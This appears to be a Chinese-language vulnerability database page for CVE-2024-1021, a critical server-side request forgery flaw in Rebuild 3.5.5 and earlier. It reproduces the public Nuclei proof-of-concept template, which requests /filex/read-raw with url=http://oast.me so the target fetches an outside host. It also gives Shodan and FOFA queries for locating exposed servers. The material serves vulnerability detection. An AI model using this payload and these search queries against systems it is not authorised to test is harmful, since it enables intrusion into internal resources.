CVE-2024-1021: Rebuild <= 3.5.5 - Server-Side Request Forgery

日期: 2025-08-01 | 影响软件: Rebuild | POC: 已公开

漏洞描述

There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.

PoC代码[已公开]

id: CVE-2024-1021

info:
  name: Rebuild <= 3.5.5 - Server-Side Request Forgery
  author: BMCel
  severity: critical
  description: |
    There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
  remediation: |
    Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
  reference:
    - https://github.com/getrebuild/rebuild
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1021
    - https://vuldb.com/?ctiid.252290
    - https://vuldb.com/?id.252290
    - https://github.com/tanjiti/sec_profile
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-1021
    cwe-id: CWE-918
    epss-score: 0.93143
    epss-percentile: 0.99787
    cpe: cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ruifang-tech
    product: rebuild
    shodan-query: http.favicon.hash:"871154672"
    fofa-query: "icon_hash=\"871154672\""
  tags: cve2024,cve,rebuild,ssrf,ruifang-tech,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "<h1> Interactsh Server </h1>")'
          - '!contains(body_1, "<h1> Interactsh Server </h1>")'
          - 'status_code_2 == 200'
        condition: and
# digest: 490a00463044022067bdf98ea33fa230ba06c06f09f9f6792e4de64d82700f8311ce84330af727e102204e204cf842622bad6d8bc52e7f4c30f38c47b0bbc9e89cc0a7a27aa4d65ff5de:922c64590222798bb761d5b6d8e72950

相关漏洞推荐